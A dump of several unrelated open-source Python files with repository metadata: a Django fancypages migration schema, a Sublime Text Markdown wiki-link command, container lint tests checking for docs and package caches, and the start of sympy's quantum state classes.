'link_url_7': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_8': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'link_url_9': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'})
},
'fancypages.container': {
'Meta': {'unique_together': "(('name', 'content_type', 'object_id'),)", 'object_name': 'Container'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'blank': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
'fancypages.contentblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'ContentBlock'},
'container': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'blocks'", 'to': "orm['fancypages.Container']"}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'fancypages.fancypage': {
'Meta': {'ordering': "['full_name']", 'object_name': 'FancyPage', '_ormbases': ['catalogue.Category']},
'category_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['catalogue.Category']", 'unique': 'True', 'primary_key': 'True'}),
'date_visible_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_visible_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'keywords': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'page_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'pages'", 'null': 'True', 'to': "orm['fancypages.PageType']"}),
'status': ('django.db.models.fields.CharField', [], {'default': "u'draft'", 'max_length': '15'}),
'visibility_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['fancypages.VisibilityType']", 'symmetrical': 'False'})
},
'fancypages.fourcolumnlayoutblock': {
'Meta': {'object_name': 'FourColumnLayoutBlock'},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.handpickedproductspromotionblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'HandPickedProductsPromotionBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'promotion': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['promotions.HandPickedProductList']", 'null': 'True'})
},
'fancypages.imageandtextblock': {
'Meta': {'object_name': 'ImageAndTextBlock', '_ormbases': ['fancypages.ContentBlock']},
'alt_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'image_asset': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'image_text_blocks'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'default': "'Your text goes here.'", 'max_length': '2000'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'fancypages.imageblock': {
'Meta': {'object_name': 'ImageBlock', '_ormbases': ['fancypages.ContentBlock']},
'alt_text': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'image_asset': ('fancypages.assets.fields.AssetKey', [], {'blank': 'True', 'related_name': "'image_blocks'", 'null': 'True', 'to': "orm['assets.ImageAsset']"}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'fancypages.offerblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'OfferBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.ConditionalOffer']", 'null': 'True'})
},
'fancypages.orderedcontainer': {
'Meta': {'object_name': 'OrderedContainer', '_ormbases': ['fancypages.Container']},
'container_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.Container']", 'unique': 'True', 'primary_key': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'fancypages.pagenavigationblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'PageNavigationBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.pagetype': {
'Meta': {'object_name': 'PageType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'fancypages.primarynavigationblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'PrimaryNavigationBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.singleproductblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'SingleProductBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']", 'null': 'True'})
},
'fancypages.tabblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TabBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.textblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TextBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'Your text goes here.'"})
},
'fancypages.threecolumnlayoutblock': {
'Meta': {'object_name': 'ThreeColumnLayoutBlock'},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'})
},
'fancypages.titletextblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TitleTextBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'Your text goes here.'"}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Your title goes here.'", 'max_length': '100'})
},
'fancypages.twitterblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'TwitterBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'max_tweets': ('django.db.models.fields.PositiveIntegerField', [], {'default': '5'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'fancypages.twocolumnlayoutblock': {
'Meta': {'object_name': 'TwoColumnLayoutBlock'},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'left_width': ('django.db.models.fields.PositiveIntegerField', [], {'default': '6', 'max_length': '3'})
},
'fancypages.videoblock': {
'Meta': {'ordering': "['display_order']", 'object_name': 'VideoBlock', '_ormbases': ['fancypages.ContentBlock']},
'contentblock_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['fancypages.ContentBlock']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'video_code': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'fancypages.visibilitytype': {
'Meta': {'object_name': 'VisibilityType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
'offer.benefit': {
'Meta': {'object_name': 'Benefit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_affected_items': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.condition': {
'Meta': {'object_name': 'Condition'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'range': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Range']", 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'value': ('oscar.models.fields.PositiveDecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'})
},
'offer.conditionaloffer': {
'Meta': {'ordering': "['-priority']", 'object_name': 'ConditionalOffer'},
'benefit': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Benefit']"}),
'condition': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['offer.Condition']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_basket_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_discount': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '12', 'decimal_places': '2', 'blank': 'True'}),
'max_global_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'max_user_applications': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'num_applications': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'num_orders': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'offer_type': ('django.db.models.fields.CharField', [], {'default': "'Site'", 'max_length': '128'}),
'priority': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'redirect_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '128', 'unique': 'True', 'null': 'True'}),
'start_datetime': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '64'}),
'total_discount': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'offer.range': {
'Meta': {'object_name': 'Range'},
'classes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'classes'", 'blank': 'True', 'to': "orm['catalogue.ProductClass']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'excluded_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'excludes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'included_categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Category']"}),
'included_products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'includes'", 'blank': 'True', 'to': "orm['catalogue.Product']"}),
'includes_all_products': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
'proxy_class': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'promotions.automaticproductlist': {
'Meta': {'object_name': 'AutomaticProductList'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'method': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'num_products': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '4'})
},
'promotions.handpickedproductlist': {
'Meta': {'object_name': 'HandPickedProductList'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'link_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalogue.Product']", 'null': 'True', 'through': "orm['promotions.OrderedProduct']", 'blank': 'True'})
},
'promotions.keywordpromotion': {
'Meta': {'object_name': 'KeywordPromotion'},
'clicks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'filter': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'keyword': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'promotions.orderedproduct': {
'Meta': {'ordering': "('display_order',)", 'object_name': 'OrderedProduct'},
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'list': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['promotions.HandPickedProductList']"}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalogue.Product']"})
},
'promotions.pagepromotion': {
'Meta': {'object_name': 'PagePromotion'},
'clicks': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'display_order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'page_url': ('oscar.models.fields.ExtendedURLField', [], {'max_length': '128', 'db_index': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['fancypages']
|
bsd-3-clause
| -8,242,269,794,335,194,000
| 77.575589
| 222
| 0.590172
| false
| 3.705232
| false
| false
| false
|
SublimeText-Markdown/MarkdownEditing
|
open_page.py
|
1
|
1363
|
import sublime, sublime_plugin
import os, string
import re
# Sublime Text 3 loads plugins as packages, so imports must be qualified
# with the package name; fall back to bare imports for Sublime Text 2.
try:
    from MarkdownEditing.wiki_page import *
except ImportError:
    from wiki_page import *
try:
    from MarkdownEditing.mdeutils import *
except ImportError:
    from mdeutils import *
class OpenPageCommand(MDETextCommand):
def is_visible(self):
"""Return True if cursor is on a wiki page reference."""
for sel in self.view.sel():
scopes = self.view.scope_name(sel.b).split(" ")
if 'meta.link.wiki.markdown' in scopes:
return True
return False
    def run(self, edit):
        print("Running OpenPageCommand")
        wiki_page = WikiPage(self.view)
        sel_region = self.get_selected()
        if sel_region:
            wiki_page.select_word_at_cursor()
            # Collapse the selection to a caret and look up wiki pages
            # matching the word under it.
            region = sublime.Region(sel_region.begin(), sel_region.begin())
            file_list = wiki_page.find_matching_files(region)
            if len(file_list) > 1:
                # Several candidate files: let the user pick from a quick panel.
                wiki_page.show_quick_list(file_list)
        else:
            name = wiki_page.identify_page_at_cursor()
            wiki_page.select_page(name)
    def get_selected(self):
        """Return the first selection region, or None if nothing is selected."""
        selection = self.view.sel()
        for region in selection:
            return region
        return None
|
mit
| -2,559,636,679,433,864,700
| 24.211538
| 75
| 0.568599
| false
| 4.032544
| false
| false
| false
|
fedora-modularity/meta-test-family
|
moduleframework/tests/generic/dockerlint.py
|
1
|
6137
|
# -*- coding: utf-8 -*-
#
# Meta test family (MTF) is a tool to test components of a modular Fedora:
# https://docs.pagure.org/modularity/
# Copyright (C) 2017 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Authors: Jan Scotka <jscotka@redhat.com>
#
from moduleframework.avocado_testers import container_avocado_test
class DockerfileLinterInContainer(container_avocado_test.ContainerAvocadoTest):
"""
:avocado: enable
:avocado: tags=sanity,rhel,fedora,docker,docker_lint_inside_test,generic
"""
    def _file_to_check(self, doc_file_list):
        """Return True if any of the given files exists in the container."""
        test_failed = False
for doc in doc_file_list:
exit_status = self.run("test -e %s" % doc, ignore_status=True).exit_status
if int(exit_status) == 0:
self.log.debug("%s doc file exists in container" % doc)
test_failed = True
return test_failed
def test_all_nodocs(self):
self.start()
all_docs = self.run("rpm -qad", verbose=False).stdout
test_failed = self._file_to_check(all_docs.split('\n'))
msg = "Documentation files exist in container. They are installed in the base image or by RUN commands."
        if test_failed:
            self.log.warn(msg)
        # Note: assertTrue(True, ...) can never fail; this check is
        # effectively informational and only logs a warning.
        self.assertTrue(True, msg=msg)
def test_installed_docs(self):
"""
This test checks whether no docs are installed by RUN dnf command
:return: FAILED in case we found some docs
PASS in case there is no doc file found
"""
self.start()
        # Double brackets have to be used because of trans_dict, which
        # formats every command string. Otherwise MTF raises:
        # 'EXCEPTION MTF: Command is formatted by using trans_dict.
        # If you want to use brackets { } in your code, please use {{ }}.'
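        # A minimal illustration of the escaping, assuming trans_dict relies
        # on str.format semantics: "%{{NAME}}".format() yields "%{NAME}".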
installed_pkgs = self.run("rpm -qa --qf '%{{NAME}}\n'", verbose=False).stdout
defined_pkgs = self.backend.getPackageList()
list_pkg = set(installed_pkgs).intersection(set(defined_pkgs))
test_failed = False
docu_pkg = []
for pkg in list_pkg:
pkg_doc = self.run("rpm -qd %s" % pkg, verbose=False).stdout
if self._file_to_check(pkg_doc.split('\n')):
docu_pkg.append(pkg)
test_failed = True
self.assertFalse(test_failed, msg="There is documentation installed for packages: %s" % ','.join(docu_pkg))
def _check_container_files(self, exts, pkg_mgr):
found_files = False
file_list = []
for ext in exts:
dir_with_ext = "/var/cache/{pkg_mgr}/**/*.{ext}".format(pkg_mgr=pkg_mgr, ext=ext)
            # Some images do not contain the find command, so we fall back
            # to a shell for-loop (or ls) instead.
ret = self.run('shopt -s globstar && for i in {dir}; do printf "%s\\n" "$i" ; done'.format(
dir=dir_with_ext),
ignore_status=True)
            # The glob stayed unexpanded, i.e. no file with this extension
            # was found.
            # TODO: I don't know how to detect failure or empty files.
if ret.stdout.strip() == dir_with_ext:
continue
file_list.extend(ret.stdout.split('\n'))
if self._file_to_check(file_list):
found_files = True
return found_files
def _dnf_clean_all(self):
"""
Function checks if files with relevant extensions exist in /var/cache/dnf directory
:return: True if at least one file exists
False if no file exists
"""
exts = ["solv", "solvx", "xml.gz", "rpm"]
return self._check_container_files(exts, "dnf")
def _yum_clean_all(self):
"""
        Function checks if files with relevant extensions exist in /var/cache/yum directory
:return: True if at least one file exists
False if no file exists
"""
# extensions are taken from https://github.com/rpm-software-management/yum/blob/master/yum/__init__.py#L2854
exts = ['rpm', 'sqlite', 'sqlite.bz2', 'xml.gz', 'asc', 'mirrorlist.txt', 'cachecookie', 'xml']
return self._check_container_files(exts, "yum")
def test_docker_clean_all(self):
"""
This test checks if `dnf/yum clean all` was called in image
:return: return True if clean all is called
return False if clean all is not called
"""
self.start()
# Detect distro in image
distro = self.run("cat /etc/os-release").stdout
if 'Fedora' in distro:
self.assertFalse(self._dnf_clean_all(), msg="`dnf clean all` is not present in Dockerfile.")
else:
self.assertFalse(self._yum_clean_all(), msg="`yum clean all` is not present in Dockerfile.")
class DockerLint(container_avocado_test.ContainerAvocadoTest):
"""
:avocado: enable
:avocado: tags=sanity,rhel,fedora,docker,docker_labels_inspect_test
"""
def testLabels(self):
"""
Function tests whether labels are set in modulemd YAML file properly.
:return:
"""
llabels = self.getConfigModule().get('labels')
if llabels is None or len(llabels) == 0:
self.log.info("No labels defined in config to check")
self.cancel()
        for key in self.getConfigModule()['labels']:
            print(self.getConfigModule()['labels'][key])
            label_ok = self.checkLabel(key, self.getConfigModule()['labels'][key])
            self.assertTrue(label_ok, msg="Label %s is not set properly in modulemd YAML file." % key)
|
gpl-3.0
| 7,287,457,387,612,954,000
| 41.324138
| 116
| 0.617403
| false
| 3.850063
| true
| false
| false
|
amitjamadagni/sympy
|
sympy/physics/quantum/state.py
|
2
|
28699
|
"""Dirac notation for states."""
from sympy import (cacheit, conjugate, Expr, Function, integrate, oo, sqrt,
Tuple)
from sympy.printing.pretty.stringpict import prettyForm, stringPict
from sympy.physics.quantum.qexpr import QExpr, dispatch_method
__all__ = [
'KetBase',
'BraBase',
'StateBase',
'State',
'Ket',
'Bra',
'TimeDepState',
'TimeDepBra',
'TimeDepKet',
'Wavefunction'
]
#-----------------------------------------------------------------------------
# States, bras and kets.
#-----------------------------------------------------------------------------
# ASCII brackets
_lbracket = "<"
_rbracket = ">"
_straight_bracket = "|"
# Unicode brackets
# MATHEMATICAL ANGLE BRACKETS
_lbracket_ucode = u"\u27E8"
_rbracket_ucode = u"\u27E9"
# LIGHT VERTICAL BAR
_straight_bracket_ucode = u"\u2758"
# Other options for unicode printing of <, > and | for Dirac notation.
# LEFT-POINTING ANGLE BRACKET
# _lbracket = u"\u2329"
# _rbracket = u"\u232A"
# LEFT ANGLE BRACKET
# _lbracket = u"\u3008"
# _rbracket = u"\u3009"
# VERTICAL LINE
# _straight_bracket = u"\u007C"
class StateBase(QExpr):
"""Abstract base class for general abstract states in quantum mechanics.
All other state classes defined will need to inherit from this class. It
carries the basic structure for all other states such as dual, _eval_adjoint
and label.
This is an abstract base class and you should not instantiate it directly,
instead use State.
"""
@classmethod
def _operators_to_state(self, ops, **options):
""" Returns the eigenstate instance for the passed operators.
This method should be overridden in subclasses. It will handle being
passed either an Operator instance or set of Operator instances. It
should return the corresponding state INSTANCE or simply raise a
NotImplementedError. See cartesian.py for an example.
"""
raise NotImplementedError("Cannot map operators to states in this class. Method not implemented!")
def _state_to_operators(self, op_classes, **options):
""" Returns the operators which this state instance is an eigenstate
of.
This method should be overridden in subclasses. It will be called on
state instances and be passed the operator classes that we wish to make
into instances. The state instance will then transform the classes
appropriately, or raise a NotImplementedError if it cannot return
        operator instances. See cartesian.py for examples.
"""
raise NotImplementedError(
"Cannot map this state to operators. Method not implemented!")
@property
def operators(self):
"""Return the operator(s) that this state is an eigenstate of"""
from operatorset import state_to_operators # import internally to avoid circular import errors
return state_to_operators(self)
def _enumerate_state(self, num_states, **options):
raise NotImplementedError("Cannot enumerate this state!")
def _represent_default_basis(self, **options):
return self._represent(basis=self.operators)
#-------------------------------------------------------------------------
# Dagger/dual
#-------------------------------------------------------------------------
@property
def dual(self):
"""Return the dual state of this one."""
return self.dual_class()._new_rawargs(self.hilbert_space, *self.args)
@classmethod
def dual_class(self):
"""Return the class used to construt the dual."""
raise NotImplementedError(
'dual_class must be implemented in a subclass'
)
def _eval_adjoint(self):
"""Compute the dagger of this state using the dual."""
return self.dual
#-------------------------------------------------------------------------
# Printing
#-------------------------------------------------------------------------
def _pretty_brackets(self, height, use_unicode=True):
# Return pretty printed brackets for the state
# Ideally, this could be done by pform.parens but it does not support the angled < and >
# Setup for unicode vs ascii
if use_unicode:
lbracket, rbracket = self.lbracket_ucode, self.rbracket_ucode
slash, bslash, vert = u'\u2571', u'\u2572', u'\u2502'
else:
lbracket, rbracket = self.lbracket, self.rbracket
slash, bslash, vert = '/', '\\', '|'
# If height is 1, just return brackets
if height == 1:
return stringPict(lbracket), stringPict(rbracket)
# Make height even
height += (height % 2)
brackets = []
for bracket in lbracket, rbracket:
# Create left bracket
if bracket in set([_lbracket, _lbracket_ucode]):
bracket_args = [ ' ' * (height//2 - i - 1) +
slash for i in range(height // 2)]
bracket_args.extend(
[ ' ' * i + bslash for i in range(height // 2)])
# Create right bracket
elif bracket in set([_rbracket, _rbracket_ucode]):
bracket_args = [ ' ' * i + bslash for i in range(height // 2)]
bracket_args.extend([ ' ' * (
height//2 - i - 1) + slash for i in range(height // 2)])
# Create straight bracket
elif bracket in set([_straight_bracket, _straight_bracket_ucode]):
bracket_args = [vert for i in range(height)]
else:
raise ValueError(bracket)
brackets.append(
stringPict('\n'.join(bracket_args), baseline=height//2))
return brackets
def _sympystr(self, printer, *args):
contents = self._print_contents(printer, *args)
return '%s%s%s' % (self.lbracket, contents, self.rbracket)
def _pretty(self, printer, *args):
from sympy.printing.pretty.stringpict import prettyForm
# Get brackets
pform = self._print_contents_pretty(printer, *args)
lbracket, rbracket = self._pretty_brackets(
pform.height(), printer._use_unicode)
# Put together state
pform = prettyForm(*pform.left(lbracket))
pform = prettyForm(*pform.right(rbracket))
return pform
def _latex(self, printer, *args):
contents = self._print_contents_latex(printer, *args)
# The extra {} brackets are needed to get matplotlib's latex
# rendered to render this properly.
return '{%s%s%s}' % (self.lbracket_latex, contents, self.rbracket_latex)
class KetBase(StateBase):
"""Base class for Kets.
This class defines the dual property and the brackets for printing. This is
an abstract base class and you should not instantiate it directly, instead
use Ket.
"""
lbracket = _straight_bracket
rbracket = _rbracket
lbracket_ucode = _straight_bracket_ucode
rbracket_ucode = _rbracket_ucode
lbracket_latex = r'\left|'
rbracket_latex = r'\right\rangle '
@classmethod
def default_args(self):
return ("psi",)
@classmethod
def dual_class(self):
return BraBase
def __mul__(self, other):
"""KetBase*other"""
from sympy.physics.quantum.operator import OuterProduct
if isinstance(other, BraBase):
return OuterProduct(self, other)
else:
return Expr.__mul__(self, other)
def __rmul__(self, other):
"""other*KetBase"""
from sympy.physics.quantum.innerproduct import InnerProduct
if isinstance(other, BraBase):
return InnerProduct(other, self)
else:
return Expr.__rmul__(self, other)
#-------------------------------------------------------------------------
# _eval_* methods
#-------------------------------------------------------------------------
def _eval_innerproduct(self, bra, **hints):
"""Evaluate the inner product betweeen this ket and a bra.
This is called to compute <bra|ket>, where the ket is ``self``.
This method will dispatch to sub-methods having the format::
        ``def _eval_innerproduct_BraClass(self, bra, **hints):``
Subclasses should define these methods (one for each BraClass) to
teach the ket how to take inner products with bras.
"""
return dispatch_method(self, '_eval_innerproduct', bra, **hints)
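    # A minimal sketch of the dispatch convention described above; ``XKet``
    # and ``XBra`` are hypothetical names, not part of sympy:
    #
    #     class XKet(KetBase):
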